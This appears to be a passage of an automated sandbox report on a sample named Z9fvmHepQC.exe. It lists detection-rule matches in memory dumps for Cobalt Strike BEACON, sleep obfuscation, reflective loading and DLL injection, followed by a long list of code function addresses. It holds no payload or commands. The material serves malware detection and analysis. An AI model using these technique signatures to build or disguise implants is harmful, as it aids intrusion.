Source: 00000000.00000003.2034996552.00000215D7E15000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon sleep obfuscation routine Author: unknown
Source: 00000000.00000003.2034996552.00000215D7E15000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 00000000.00000003.2034996552.00000215D7E15000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 Author: unknown
Source: 00000000.00000002.3255937250.00000217D9E50000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon sleep obfuscation routine Author: unknown
Source: 00000000.00000003.2013941314.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 00000000.00000003.2013941314.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 00000000.00000003.2013941314.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon sleep obfuscation routine Author: unknown
Source: 00000000.00000003.2013941314.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 00000000.00000003.2013941314.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 Author: unknown
Source: 00000000.00000003.2008825010.00000215D77DA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon sleep obfuscation routine Author: unknown
Source: 00000000.00000003.2008952668.00000215D77DA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon sleep obfuscation routine Author: unknown
Source: 00000000.00000002.3254228521.00000215D76E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 00000000.00000002.3254228521.00000215D76E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 00000000.00000002.3254228521.00000215D76E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon sleep obfuscation routine Author: unknown
Source: 00000000.00000002.3254228521.00000215D76E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 00000000.00000002.3254228521.00000215D76E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000000.00000003.2037561994.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 00000000.00000003.2037561994.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 00000000.00000003.2037561994.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon sleep obfuscation routine Author: unknown
Source: 00000000.00000003.2037561994.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 00000000.00000003.2037561994.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 Author: unknown
Source: 00000000.00000002.3255217619.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 00000000.00000002.3255217619.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 00000000.00000002.3255217619.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon sleep obfuscation routine Author: unknown
Source: 00000000.00000002.3255217619.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 00000000.00000002.3255217619.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 Author: unknown
Source: 00000000.00000003.2009609332.00000215D78F4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon sleep obfuscation routine Author: unknown
Source: 00000000.00000003.2023164219.00000215D7B92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 00000000.00000003.2023164219.00000215D7B92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 00000000.00000003.2023164219.00000215D7B92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon sleep obfuscation routine Author: unknown
Source: 00000000.00000003.2023164219.00000215D7B92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 00000000.00000003.2023164219.00000215D7B92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 Author: unknown
Source: 00000000.00000003.2035766145.00000215D7B92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 00000000.00000003.2035766145.00000215D7B92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 00000000.00000003.2035766145.00000215D7B92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon sleep obfuscation routine Author: unknown
Source: 00000000.00000003.2035766145.00000215D7B92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 00000000.00000003.2035766145.00000215D7B92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 Author: unknown
Source: 00000000.00000003.2011785249.00000215D7B7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 00000000.00000003.2011785249.00000215D7B7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 00000000.00000003.2011785249.00000215D7B7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon sleep obfuscation routine Author: unknown
Source: 00000000.00000003.2011785249.00000215D7B7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 00000000.00000003.2011785249.00000215D7B7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 Author: unknown
Source: 00000000.00000003.2022082585.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 00000000.00000003.2022082585.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 00000000.00000003.2022082585.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon sleep obfuscation routine Author: unknown
Source: 00000000.00000003.2022082585.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 00000000.00000003.2022082585.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 Author: unknown
Source: 00000000.00000003.2018881215.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 00000000.00000003.2018881215.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 00000000.00000003.2018881215.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon sleep obfuscation routine Author: unknown
Source: 00000000.00000003.2018881215.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 00000000.00000003.2018881215.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 Author: unknown
Source: 00000000.00000003.2008238134.00000215D7880000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 00000000.00000003.2008238134.00000215D7880000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 00000000.00000003.2008238134.00000215D7880000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 Author: unknown
Source: 00000000.00000003.2008238134.00000215D78F4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon sleep obfuscation routine Author: unknown
Source: 00000000.00000003.2009131449.00000215D77E5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon sleep obfuscation routine Author: unknown
Source: 00000000.00000003.2008178877.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 00000000.00000003.2008178877.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 00000000.00000003.2008178877.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon sleep obfuscation routine Author: unknown
Source: 00000000.00000003.2008178877.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 00000000.00000003.2008178877.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 Author: unknown
Source: 00000000.00000003.2009082132.00000215D77DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon sleep obfuscation routine Author: unknown
Source: 00000000.00000003.2016857846.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 00000000.00000003.2016857846.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 00000000.00000003.2016857846.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon sleep obfuscation routine Author: unknown
Source: 00000000.00000003.2016857846.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 00000000.00000003.2016857846.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 Author: unknown
Source: 00000000.00000003.2035560435.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 00000000.00000003.2035560435.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 00000000.00000003.2035560435.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon sleep obfuscation routine Author: unknown
Source: 00000000.00000003.2035560435.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 00000000.00000003.2035560435.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 Author: unknown
Source: 00000000.00000003.2014311961.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 00000000.00000003.2014311961.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 00000000.00000003.2014311961.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon sleep obfuscation routine Author: unknown
Source: 00000000.00000003.2014311961.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 00000000.00000003.2014311961.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 Author: unknown
Source: 00000000.00000003.2013432042.00000215D7B93000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 00000000.00000003.2013432042.00000215D7B93000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 00000000.00000003.2013432042.00000215D7B93000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon sleep obfuscation routine Author: unknown
Source: 00000000.00000003.2013432042.00000215D7B93000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 00000000.00000003.2013432042.00000215D7B93000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 Author: unknown
Source: 00000000.00000003.2034925752.00000215D7C30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 00000000.00000003.2034925752.00000215D7C30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 00000000.00000003.2034925752.00000215D7C30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon sleep obfuscation routine Author: unknown
Source: 00000000.00000003.2034925752.00000215D7C30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 00000000.00000003.2034925752.00000215D7C30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 Author: unknown
Source: 00000000.00000003.2009899163.00000215D7B90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 00000000.00000003.2009899163.00000215D7B90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 00000000.00000003.2009899163.00000215D7B90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon sleep obfuscation routine Author: unknown
Source: 00000000.00000003.2009899163.00000215D7B90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 00000000.00000003.2009899163.00000215D7B90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 Author: unknown
Source: Process Memory Space: Z9fvmHepQC.exe PID: 1720, type: MEMORYSTR	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown

Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00000215D7708EF0	0_2_00000215D7708EF0
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00000215D77076B0	0_2_00000215D77076B0
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00000215D77016B4	0_2_00000215D77016B4
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00000215D76E9680	0_2_00000215D76E9680
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00000215D76FCF5C	0_2_00000215D76FCF5C
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00000215D76EF5E8	0_2_00000215D76EF5E8
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00000215D76F55A8	0_2_00000215D76F55A8
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00000215D7708580	0_2_00000215D7708580
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00000215D76FB548	0_2_00000215D76FB548
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00000215D770A500	0_2_00000215D770A500
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00000215D76ECB80	0_2_00000215D76ECB80
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00000215D7708297	0_2_00000215D7708297
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00000215D76FC314	0_2_00000215D76FC314
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00000215D76F6098	0_2_00000215D76F6098
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00000215D76E916C	0_2_00000215D76E916C
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00000215D76FE13C	0_2_00000215D76FE13C
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00000215D770685C	0_2_00000215D770685C
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00000215D76FD840	0_2_00000215D76FD840
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66E05ADEF	0_2_00007FF66E05ADEF
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66E022626	0_2_00007FF66E022626
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66E01BD8C	0_2_00007FF66E01BD8C
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66E273C99	0_2_00007FF66E273C99
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66DFA3392	0_2_00007FF66DFA3392
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66E05F1AE	0_2_00007FF66E05F1AE
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66DFA5080	0_2_00007FF66DFA5080
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66E0C8F00	0_2_00007FF66E0C8F00
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66E0887FC	0_2_00007FF66E0887FC
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66DFA491A	0_2_00007FF66DFA491A
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66DFA1BD9	0_2_00007FF66DFA1BD9
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66E011963	0_2_00007FF66E011963
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66E035AA5	0_2_00007FF66E035AA5
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66E055AFA	0_2_00007FF66E055AFA
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66E0EAFA0	0_2_00007FF66E0EAFA0
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66DFE700A	0_2_00007FF66DFE700A
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66DFB7070	0_2_00007FF66DFB7070
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66E0E2E00	0_2_00007FF66E0E2E00
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66E0E6F20	0_2_00007FF66E0E6F20
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66DFA6B89	0_2_00007FF66DFA6B89
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66E016BF0	0_2_00007FF66E016BF0
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66E0B6D26	0_2_00007FF66E0B6D26
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66E06A936	0_2_00007FF66E06A936
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66E02E974	0_2_00007FF66E02E974
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66E272A50	0_2_00007FF66E272A50
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66E0CEA8E	0_2_00007FF66E0CEA8E
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66DFE6ACF	0_2_00007FF66DFE6ACF
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66E0D6AF3	0_2_00007FF66E0D6AF3
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66E0EEAE0	0_2_00007FF66E0EEAE0
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66E0FEB00	0_2_00007FF66E0FEB00
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66DFDA78B	0_2_00007FF66DFDA78B
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66DFD679C	0_2_00007FF66DFD679C
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66E0E2830	0_2_00007FF66E0E2830
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66DFB2850	0_2_00007FF66DFB2850
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66E106840	0_2_00007FF66E106840
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66E0C68F7	0_2_00007FF66E0C68F7
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66E2725DD	0_2_00007FF66E2725DD
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66E07A631	0_2_00007FF66E07A631
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66E0EE680	0_2_00007FF66E0EE680
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66E0E63A0	0_2_00007FF66E0E63A0
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66DFBA4B0	0_2_00007FF66DFBA4B0
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66E05A513	0_2_00007FF66E05A513
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66E06E14F	0_2_00007FF66E06E14F
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66E1621AC	0_2_00007FF66E1621AC
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66E08E247	0_2_00007FF66E08E247
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66DFAFFB0	0_2_00007FF66DFAFFB0
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66DFAC000	0_2_00007FF66DFAC000
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66E0C801B	0_2_00007FF66E0C801B
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66E0F80C0	0_2_00007FF66E0F80C0
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66E017D85	0_2_00007FF66E017D85
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66E153EA9	0_2_00007FF66E153EA9
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66DFB3EA0	0_2_00007FF66DFB3EA0
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66E16BBA0	0_2_00007FF66E16BBA0
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66E1DBBD6	0_2_00007FF66E1DBBD6
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66DFCBBB9	0_2_00007FF66DFCBBB9
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66E1EFCB5	0_2_00007FF66E1EFCB5
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66DFDBCED	0_2_00007FF66DFDBCED
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66E017941	0_2_00007FF66E017941
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66E01F993	0_2_00007FF66E01F993
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66E1039D0	0_2_00007FF66E1039D0
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66E07BB31	0_2_00007FF66E07BB31
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66E07B74A	0_2_00007FF66E07B74A
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66DFAF8D0	0_2_00007FF66DFAF8D0
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66E08B55F	0_2_00007FF66E08B55F
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66DFB36A0	0_2_00007FF66DFB36A0
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66E10F4D6	0_2_00007FF66E10F4D6
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66DFD71A0	0_2_00007FF66DFD71A0
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66DFDB1B5	0_2_00007FF66DFDB1B5
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66E00F22F	0_2_00007FF66E00F22F
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66E0FB240	0_2_00007FF66E0FB240
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66DFB90B0	0_2_00007FF66DFB90B0
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66E084DEB	0_2_00007FF66E084DEB
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66DFB8F00	0_2_00007FF66DFB8F00
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66DFACF22	0_2_00007FF66DFACF22
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66DFB8A30	0_2_00007FF66DFB8A30
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66E264742	0_2_00007FF66E264742
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66E0D0850	0_2_00007FF66E0D0850
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66E0D4930	0_2_00007FF66E0D4930
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66E06863C	0_2_00007FF66E06863C
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66DFDC68F	0_2_00007FF66DFDC68F
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66DFB0390	0_2_00007FF66DFB0390
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66DFD84D4	0_2_00007FF66DFD84D4
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66E0A0521	0_2_00007FF66E0A0521
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66DFB8180	0_2_00007FF66DFB8180
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66DFBC210	0_2_00007FF66DFBC210
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66E0301FB	0_2_00007FF66E0301FB
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66E018200	0_2_00007FF66E018200
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66DFC0277	0_2_00007FF66DFC0277
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66E0E42A0	0_2_00007FF66E0E42A0
